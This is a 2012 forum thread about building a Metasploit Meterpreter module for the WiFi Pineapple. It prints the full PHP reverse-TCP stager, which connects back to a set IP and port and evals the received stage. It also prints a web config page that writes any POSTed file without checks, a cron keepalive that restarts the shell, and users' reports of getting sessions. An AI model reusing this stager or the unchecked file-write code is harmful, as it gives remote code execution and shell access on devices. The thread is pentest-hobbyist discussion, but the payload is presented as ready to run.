Mk4 Meterpreter Module Wip

[Darren Kitchen]

So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress.

Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit):

And here's a pic of the module WIP:

It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload.

Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch.

Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($B) < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($B)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($B)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($B);
die();

?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

meterpreter.php

<?php                                                                                                    

if(isset($_GET['start'])) {
	echo "<pre>Starting Meterpreter</pre>";
	exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

//	if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
//		exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
//	} else {
//		echo "<pre><b>Meterpreter already running</b></pre>";
//	}
}

$filename = $_POST['filename'];                                                                          
$newdata = $_POST['newdata'];                                                                            

if ($newdata != "") { $newdata = ereg_replace(13,  "", $newdata);                                        
$fw = fopen($filename, 'w') or die('Could not open file!');                                             
$fb = fwrite($fw,stripslashes($newdata)) or die('Could not write to file');                             
fclose($fw);                                                                                            
$fileMessage = "Updated " . $filename . "<br /><br />";                                                 
} ?>


<html>
    <head>
    <title>Pineapple Control Center</title>
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
    <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
    </head>
<body>
<?php
include_once("/www/pineapple/includes/navbar.php");
?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
	<div class=moduleTitle><b>Configuration</b></div>
	<div class=moduleContent>
	Edit IP address and Port below to match that of your metasploit session.
	<?php                                                                                                                                                                                                               
	$filename = "/www/pineapple/modules/meterpreter/tt.php";
	$fh = fopen($filename, "r") or die("Could not open file!");
	$data = fread($fh, filesize($filename)) or die("Could not read file!");                                                                                                                                           
	fclose($fh);                                                                                                                                                                                                      
	echo "<form action='$_SERVER[php_self]' method= 'post' >                                                                                                                                                           
	<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea>                                                                               
	<input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
	<br><center><input type='submit' value='Update Meterpreter Script'>                                                                                                                                                                
	</form>";                                                                                                                                                                                                           
	?>       

	</div>

	<br>
	<div class=moduleTitle>Meterpreter Configuration</div>
	<div class=moduleContent>
	This keep alive script will restart the Meterpreter session if it drops connection.


	</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh

#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
if ! ( pidof php tt.php); then
	php /www/pineapple/modules/meterpreter/tt.php &
	logger "Meterpreter: Connection was down, restarted."
else
	logger "Meterpreter: Connection seems to be up."
fi

My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up.

Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...

[Anton]

Can't wait! nice work!

[Razzlerock]

I saw your tweet this morning about this and it looks so very cool. Here is the youtube link from your tweet for the other guys to view;

The sky is the limit with this pineapple and the dedicated team/forum.

Razzlerock

[sUbZeRo]

Looking forward to this module! :)

[TheOniVeritas]

Very nice im new to metasploit, using armitage cant find any hosts. is there a special config for the pineapple

[Crazy52]

i have to say i love watching the progress on the pineapple, and this just makes it all the more epic.

[zbenta]

Way to go Darren.

Edited June 15, 2012 by zbenta

[telot]

Even more cool...is Darren now using a MAC?! Has Paul brought you over to the dark side (the cool side imho)?

Kidding aside, this looks like a great addition to the pineapple - I thinking bringing more and more metasploit into the fold only bolsters the pineapples e-rep - a lot of folks in the community now a days looks on wifi hacks as almost passé. This kind of metasploit integration will lend credence to the fact that wifi is a great attack vector and very much worth not looking over. Thanks Darren!

telot

[Anton]

Hey guy's Armitage & Cobalt Strike, why is one expensive and for windows only and the other one is free lol? they look like they do the exact same job, not to mention they look identical, are there anyx major differences that justify spending the big bucks for Cobalt Strike?

Cheer's - Anton.

[Darren Kitchen]

Think Red Hat Enterprise vs centos.

[HakenDecker]

That PHP is beer-worthy.

Edited June 15, 2012 by HakenDecker

[Anton]

Think Red Hat Enterprise vs centos.

Ah i gotcha, cheers.

[Battery_]

Are there any updates?

[Battery_]

So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?

[Hackrylix]

Hi Darren,

Do you have some update to tease us ? I'd like to understand better what you're trying to do. May we contribute together ?

Cheers !

[blkik]

So I got this working sort of... I just uploaded the meterpreter.php exploit into the www directory and named it m.php

So when I browse to m.php I get my evil looking linux icon in Armitage and get my meterpreter session. However whenever I try to make a pivot or anything I get "loading scdapi. Try command again later" Anyone else have that issue?

I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?

I did see that meterpreter comes back with a message as follows:

meterpreter> load stdapi

[*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh)

Edited December 2, 2012 by blkik

[BlackZero]

Very nice, I can't wait for the module!

Hope to see it soon in our modules :-)

[airman_dopey]

Also looking forward to checking this out. Hopefully it is still in the works....

[icedevil433]

is there any update regarding whats been discussed above?

I'm getting the same error. Thought it might be that metasploit just needs time to load stdapi, but looking at the console, the load is actually timing out. Am I missing something?

I did see that meterpreter comes back with a message as follows:

meterpreter> load stdapi [*] Timed out waiting for command to completeLastly, the meterpreter.php file above contains the line: exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");but the code for this file doesn't appear to be on this page like the others (e.g. meterpreter-keepalive.sh)

[DuoM]

Also looking for an update on the "can't load stdapi" error.

[DuoM]

Here's what Ive tried:

In armitage, when firing up the php/meterpreter/reverse_tcp attack, under advanced options I set AutoLoadStdApi = 0, so that i could load it myself and see what happens. Running the exploit worked just fined, got my pwnd Pineapple and meterpreter shell. So I typed "load stdapi" and it says "loading stdapi extension..."... and just sits there. Nothing happens. So I crack another shell and try it again, and it says "stdapi extension already loaded." Trying ping sweep or pivoting still yields the "loading stdapi. try command later" error.

I'm not to familiar with where the code is to dive in and try to figure this out, so any advice would be appreciated.

Thanks!

[Sebkinne]

I'll take a look at this module in the future. For now the development has stopped.